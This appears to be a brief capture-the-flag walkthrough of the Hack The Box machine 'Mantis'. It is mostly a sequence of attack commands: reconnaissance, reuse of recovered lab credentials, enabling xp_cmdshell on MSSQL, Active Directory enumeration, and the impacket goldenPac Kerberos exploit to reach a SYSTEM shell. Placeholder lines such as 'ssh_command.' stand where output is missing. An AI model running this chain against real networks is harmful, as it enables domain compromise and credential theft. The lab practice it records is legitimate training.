Mantis

Mantis

Apr 16, 2024
HTB Windows

“nmap -A -p- -oA mantis 10.129.12.242 —min-rate=10000 —script=vuln —script-timeout=15 -v ```

nmap -sC -sV -O -p- -oA mantis 10.129.12.242

echo "10.129.12.242 mantis.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA mantis-udp 10.129.12.242

whichSystem 10.129.12.242

ssh_command. nmap -p- --open -T5 -v -n 10.129.12.242

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.12.242 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389 10.129.12.242 -oN targeted

ssh_command.

rpcclient -U "" 10.129.12.242 -N

ssh_command.

crackmapexec smb 10.129.12.242

ssh_command.

Agregamos htb.local a /etc/hosts

smbclient -L 10.129.12.242 -N

smbmap -H 10.129.12.242 -u 'null'

ssh_command.

cat targeted | grep http | grep tcp | awk '{print $1}'

ssh_command.

whatweb http://10.129.12.242:1337

ssh_command.

ssh_command.

En http://10.129.12.242:8080

ssh_command.

gobuster dir -u http://mantis.htb:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60

ssh_command.

searchsploit orchard

ssh_command.

http://mantis.htb:1337/secure_notes

ssh_command.

Le damos click al archivo de txt

ssh_command. Agarramos una parte del url y le hacemos base64

echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -ps -r;

ssh_command.

ssh_command.

sqsh -S 10.10.10.52 -U admin -P 'm$$ql_S@_P@ssW0rd!'

EXEC SP_CONFIGURE 'show advanced options', 1 reconfigure go

EXEC SP_CONFIGURE 'xp_cmdshell' , 1

reconfigure

go

xp_cmdshell 'whoami'

go

ssh_command.

dbeaver

Escogemos mssql server

ssh_command.

ssh_command.

buscamos en blog_Orchard_Users_UserPartRecord y le damos click a la pestana Data

ssh_command.

Credenciales-> james:‘J@m3s_P@ssW0rd!’

ssh_command.

crackmapexec smb mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!'

ssh_command.

rpcclient -U 'james%J@m3s_P@ssW0rd!' mantis.htb -c "enumdoumusers"

ssh_command.

rpcclient -U 'james%J@m3s_P@ssW0rd!' mantis.htb -c "enumdoumgroups"

ssh_command.

rpcclient -U 'james%J@m3s_P@ssW0rd!' mantis.htb -c "queryuser james"

ssh_command.

ssh_command.

ldapdomaindump -u 'htb.local\james' -p 'J@m3s_P@ssW0rd!' mantis.htb

firefox domain_users_by_group.html

ssh_command.

crackmapexec winrm mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!'

smbmap -H mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!'

ssh_command.

smbmap -H mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!' -r SYSVOL

ssh_command.

smbmap -H mantis.htb -u 'james' -p 'J@m3s_P@ssW0rd!' -r SYSVOL/htb.local

ssh_command.

batcat users.txt

ssh_command.

python3 /opt/impacket/examples/GetNPUsers.py htb.local/ -no-pass -usersfile users.txt

ssh_command.

python3 /opt/impacket/examples/GetUserSPNs.py htb.local/james@mantis.htb

ssh_command. mkdir bh

cd bh

bloodhound-python -c All -ns mantis.htb -d htb.local -u 'james' -p 'J@m3s_P@ssW0rd!'

ssh_command.

neo4j console

bloodhound &> /dev/null & disown

ssh_command.

Me dio un error subiendo los archivos json.

Cambiamos /etc/hosts

ssh_command.

impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'

type c:\users\administrator\desktop\root.txt

ssh_command.